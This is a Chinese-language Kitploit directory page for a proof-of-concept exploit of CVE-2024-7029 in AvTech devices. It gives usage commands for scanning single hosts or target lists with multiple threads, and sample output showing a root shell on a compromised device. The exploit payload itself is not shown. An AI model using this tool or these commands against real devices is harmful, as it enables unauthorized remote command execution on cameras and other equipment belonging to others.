Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-7029 — CVE-2024-7029 在 AvTech 设备中的 PoC 漏洞利用。扫描易受攻击的目标,并提供交互式远程 Shell 以执行命令,支持多线程扫描。 | Kitploit
工具/GitHubGitHub/geniuszly/cve-2024-7029
漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队远程访问工具
GitHubgeniuszly/cve-2024-7029

CVE-2024-7029

CVE-2024-7029 在 AvTech 设备中的 PoC 漏洞利用。扫描易受攻击的目标,并提供交互式远程 Shell 以执行命令,支持多线程扫描。

查看仓库
911年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

EN

GenAvTechRCEExploit 一种针对 AvTech 设备中 CVE-2024-7029 漏洞的概念验证漏洞利用工具,允许远程代码执行(RCE)。该工具可以扫描易受攻击的设备并与之交互执行命令。

功能

  • 漏洞检测:检查 AvTech 设备是否存在 RCE 漏洞。
  • 交互式 Shell:通过交互式 Shell 在目标设备上执行命令。
  • 多线程扫描:使用多线程同时扫描多个目标。
  • 有效载荷执行:通过发送精心构造的有效载荷远程执行命令来攻击目标。

要求

  • Python 3.7+
  • requests 库
  • prompt_toolkit 库
  • alive_progress 库

使用以下命令安装所需库:

root@kitploit:~
pip install -r requirements.txt

使用方法

扫描单个目标

要检查单个目标是否存在漏洞并启动交互式 Shell:

root@kitploit:~
python3 GenAvTechRCEExploit.py -u <target_url>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100

[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки

将 <target_url> 替换为目标设备的实际 URL。

扫描多个目标

要扫描文件中提供的多个目标(每行一个 URL):

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -f targets.txt

Scanning Targets |████████████████████████████████████████| 100% 
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима

将 <file_path> 替换为包含目标 URL 的文件路径。

线程数

你可以使用 -t 选项指定扫描的线程数:

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>

默认情况下,线程数为 10。

示例

root@kitploit:~
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20
下载工具